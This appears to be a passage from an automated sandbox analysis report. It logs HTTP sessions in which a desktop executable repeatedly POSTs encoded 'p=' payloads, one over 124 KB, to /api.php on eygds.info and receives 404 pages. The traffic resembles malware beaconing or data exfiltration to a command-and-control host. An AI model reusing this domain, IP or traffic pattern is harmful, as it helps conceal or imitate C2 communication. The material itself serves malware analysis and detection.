Dec 30, 2024 01:58:30.028901100 CET	224	IN	Data Raw: 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 Data Ascii: -equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks like the page is
Dec 30, 2024 01:58:30.028912067 CET	1236	IN	Data Raw: 6c 6f 73 74 2e 20 53 74 61 72 74 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 6f 6e 20 74 68 65 20 63 68 65 61 70 2e 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 Data Ascii: lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href="/htdocs_error/style.css"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css"> <link href="https://fo
Dec 30, 2024 01:58:30.028923035 CET	55	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: </div> </div></body></html>
Dec 30, 2024 01:58:30.028951883 CET	12360	OUT	Data Raw: 70 3d 70 68 44 68 54 7a 34 6c 4b 64 71 69 49 61 55 69 41 71 4a 38 25 32 42 57 2f 4b 61 58 4b 50 5a 5a 6f 6e 73 79 4b 74 61 38 52 44 64 32 34 42 69 4c 7a 62 62 72 36 6e 47 6b 71 45 48 35 56 48 6f 4d 34 48 58 45 33 56 69 35 34 70 33 4f 77 4a 32 75 Data Ascii: p=phDhTz4lKdqiIaUiAqJ8%2BW/KaXKPZZonsyKta8RDd24BiLzbbr6nGkqEH5VHoM4HXE3Vi54p3OwJ2u7b1%2BuDbKYThHqXrdRys71yo6iq0YhCfLRv6PnYrWRRtaIEBbsfP0YfRNNarEZc9oxWASh1iQjZ3pUh9yjMurmGJ5P3gl8S1YxwSnyegAQedvLEgjgOMA67lum/JMG87OCde36frctmOgvQnUovMamRRP%2BSSdu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50001	156.67.74.96	80	6972	C:\Users\user\Desktop\ZOYGRL1ePa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:58:33.184885025 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 286 Expect: 100-continue
Dec 30, 2024 01:58:33.537621975 CET	286	OUT	Data Raw: 70 3d 32 71 48 30 4b 42 48 48 6c 70 4d 72 49 79 6b 47 2f 59 56 69 37 4a 56 31 25 32 42 25 32 42 45 37 71 41 77 32 37 52 72 62 56 7a 39 54 36 45 33 38 52 5a 33 48 57 59 7a 5a 75 6c 70 35 43 66 6c 6f 72 66 45 4a 58 63 47 66 49 54 6c 2f 74 48 35 33 Data Ascii: p=2qH0KBHHlpMrIykG/YVi7JV1%2B%2BE7qAw27RrbVz9T6E38RZ3HWYzZulp5CflorfEJXcGfITl/tH53qbP3ybh%2B5R%2BoQfDJYdxY%2BLeL4CfPUNjeMyQYy%2BhznJ/iR%2B8EfLeOyp5yqnHAxQIhLcFZI8Mkffz42B7krq2u7OXqqle7sxfGYqM4gionehlh7cV962TIKR3V7cktRe%2BNwMtZWMxPYK2AGL8riBZtj
Dec 30, 2024 01:58:33.765522957 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:58:33.765763044 CET	1236	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:58:33 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute;
Dec 30, 2024 01:58:33.765774012 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 Data Ascii: } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks
Dec 30, 2024 01:58:33.765784979 CET	316	IN	Data Raw: 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c Data Ascii: px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not
Dec 30, 2024 01:58:33.766588926 CET	257	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 124324 Expect: 100-continue
Dec 30, 2024 01:58:33.927474976 CET	1236	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 53 65 70 20 32 30 32 31 20 31 32 3a 34 39 3a 30 33 20 47 4d 54 0d 0a 65 74 61 67 3a 20 22 39 39 39 2d 36 31 35 35 62 32 33 66 2d 39 62 31 65 32 64 61 38 31 30 39 64 34 36 64 33 3b 3b 3b 22 0d 0a 61 63 63 65 70 74 2d 72 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 32 34 35 37 0d 0a 64 61 74 65 3a 20 4d 6f 6e 2c 20 33 30 20 44 65 63 20 32 30 32 34 20 30 30 3a 35 38 3a 33 33 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 4c 69 74 65 53 70 65 65 64 0d 0a 70 6c 61 74 66 6f 72 6d 3a 20 68 6f 73 74 69 6e 67 65 72 0d 0a 70 61 6e 65 6c 3a 20 68 70 61 6e 65 6c 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 [TRUNCATED] Data Ascii: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Thu, 30 Sep 2021 12:49:03 GMTetag: "999-6155b23f-9b1e2da8109d46d3;;;"accept-ranges: bytescontent-length: 2457date: Mon, 30 Dec 2024 00:58:33 GMTserver: LiteSpeedplatform: hostingerpanel: hpanel<!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; [TRUNCATED]
Dec 30, 2024 01:58:33.927490950 CET	1236	IN	Data Raw: 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d Data Ascii: </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks like the pa
Dec 30, 2024 01:58:33.927498102 CET	304	IN	Data Raw: 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65 Data Ascii: tdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not intentional

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50002	156.67.74.96	80	6972	C:\Users\user\Desktop\ZOYGRL1ePa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:58:33.185197115 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 318 Expect: 100-continue
Dec 30, 2024 01:58:33.537533045 CET	318	OUT	Data Raw: 70 3d 53 50 74 31 6f 66 78 74 4b 32 44 43 4d 33 76 36 48 52 54 61 63 6d 33 63 4e 6b 70 59 32 6f 30 74 64 45 33 70 58 52 25 32 42 69 6e 4d 7a 59 62 6c 48 35 41 74 35 59 38 62 56 30 72 41 69 44 59 37 4d 46 68 34 79 5a 7a 2f 55 6b 4a 45 44 6e 73 48 Data Ascii: p=SPt1ofxtK2DCM3v6HRTacm3cNkpY2o0tdE3pXR%2BinMzYblH5At5Y8bV0rAiDY7MFh4yZz/UkJEDnsHiWnAK5VejmZXtsIuHcNhAfTr/kpJ3T4NdVATzZSgk6aCWwwi02LX4Yb/0Zd93ojmhbn3r3ad0Il0nvMjTt02Pe9RI5K5tzpxNMU6meKEHoOH%2BCCrwJE9NzmCefLQuoszSDLx8X8KJFwaeHhu7wW7bvMn83umqay
Dec 30, 2024 01:58:33.725634098 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:58:33.725905895 CET	1236	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:58:33 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute;
Dec 30, 2024 01:58:33.725917101 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 Data Ascii: } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks
Dec 30, 2024 01:58:33.725928068 CET	316	IN	Data Raw: 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c Data Ascii: px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50013	156.67.74.96	80	6972	C:\Users\user\Desktop\ZOYGRL1ePa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:58:34.764889002 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 286 Expect: 100-continue
Dec 30, 2024 01:58:35.115585089 CET	286	OUT	Data Raw: 70 3d 32 71 48 30 4b 42 48 48 6c 70 4d 72 49 79 6b 47 2f 59 56 69 37 4a 56 31 25 32 42 25 32 42 45 37 71 41 77 32 37 52 72 62 56 7a 39 54 36 45 33 38 52 5a 33 48 57 59 7a 5a 75 6c 70 35 43 66 6c 6f 72 66 45 4a 58 63 47 66 49 54 6c 2f 74 48 35 33 Data Ascii: p=2qH0KBHHlpMrIykG/YVi7JV1%2B%2BE7qAw27RrbVz9T6E38RZ3HWYzZulp5CflorfEJXcGfITl/tH53qbP3ybh%2B5R%2BoQfDJYdxY%2BLeL4CfPUNjeMyQYy%2BhznJ/iR%2B8EfLeOyp5yqnHAxQIhLcFZI8Mkffz42B7krq2u7OXqqle7sxfGYqM4gionehlh7cV962TIKR3V7cktRe%2BNwMtZWMxPYK2AGL8riBZtj
Dec 30, 2024 01:58:35.305811882 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:58:35.305907011 CET	1236	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:58:35 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute;
Dec 30, 2024 01:58:35.305918932 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 Data Ascii: } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks
Dec 30, 2024 01:58:35.305934906 CET	316	IN	Data Raw: 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c Data Ascii: px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50023	156.67.74.96	80	6972	C:\Users\user\Desktop\ZOYGRL1ePa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:58:36.675534964 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 318 Expect: 100-continue
Dec 30, 2024 01:58:37.045007944 CET	318	OUT	Data Raw: 70 3d 53 50 74 31 6f 66 78 74 4b 32 44 43 4d 33 76 36 48 52 54 61 63 6d 33 63 4e 6b 70 59 32 6f 30 74 64 45 33 70 58 52 25 32 42 69 6e 4d 7a 59 62 6c 48 35 41 74 35 59 38 62 56 30 72 41 69 44 59 37 4d 46 68 34 79 5a 7a 2f 55 6b 4a 45 44 6e 73 48 Data Ascii: p=SPt1ofxtK2DCM3v6HRTacm3cNkpY2o0tdE3pXR%2BinMzYblH5At5Y8bV0rAiDY7MFh4yZz/UkJEDnsHiWnAK5VejmZXtsIuHcDcNbnCAXiaaJHP/SmX8IkAk6aCWwwi02LX4Yb/0Zd93ojmhbn3r3ad0Il0nvMjTt02Pe9RI5K5tzpxNMU6meKEHoOH%2BCCrwJE9NzmCefLQuoszSDLx8X8KJFwaeHhu7wW7bvMn83umqay
Dec 30, 2024 01:58:37.236609936 CET	1236	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 53 65 70 20 32 30 32 31 20 31 32 3a 34 39 3a 30 33 20 47 4d 54 0d 0a 65 74 61 67 3a 20 22 39 39 39 2d 36 31 35 35 62 32 33 66 2d 39 62 31 65 32 64 61 38 31 30 39 64 34 36 64 33 3b 3b 3b 22 0d 0a 61 63 63 65 70 74 2d 72 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 32 34 35 37 0d 0a 64 61 74 65 3a 20 4d 6f 6e 2c 20 33 30 20 44 65 63 20 32 30 32 34 20 30 30 3a 35 38 3a 33 37 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 4c 69 74 65 53 70 65 65 64 0d 0a 70 6c 61 74 66 6f 72 6d 3a 20 68 6f 73 74 69 6e 67 65 72 0d 0a 70 61 6e 65 6c 3a 20 68 70 61 6e 65 6c 0d 0a 0d 0a 3c 21 44 4f 43 54 59 [TRUNCATED] Data Ascii: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmllast-modified: Thu, 30 Sep 2021 12:49:03 GMTetag: "999-6155b23f-9b1e2da8109d46d3;;;"accept-ranges: bytescontent-length: 2457date: Mon, 30 Dec 2024 00:58:37 GMTserver: LiteSpeedplatform: hostingerpanel: hpanel<!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { [TRUNCATED]
Dec 30, 2024 01:58:37.236629963 CET	1236	IN	Data Raw: 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 Data Ascii: position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="descript
Dec 30, 2024 01:58:37.236644983 CET	341	IN	Data Raw: 65 64 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 35 30 30 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ed"><img style="width:500px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just
Dec 30, 2024 01:58:37.241839886 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 286 Expect: 100-continue
Dec 30, 2024 01:58:37.394548893 CET	25	IN	HTTP/1.1 100 Continue
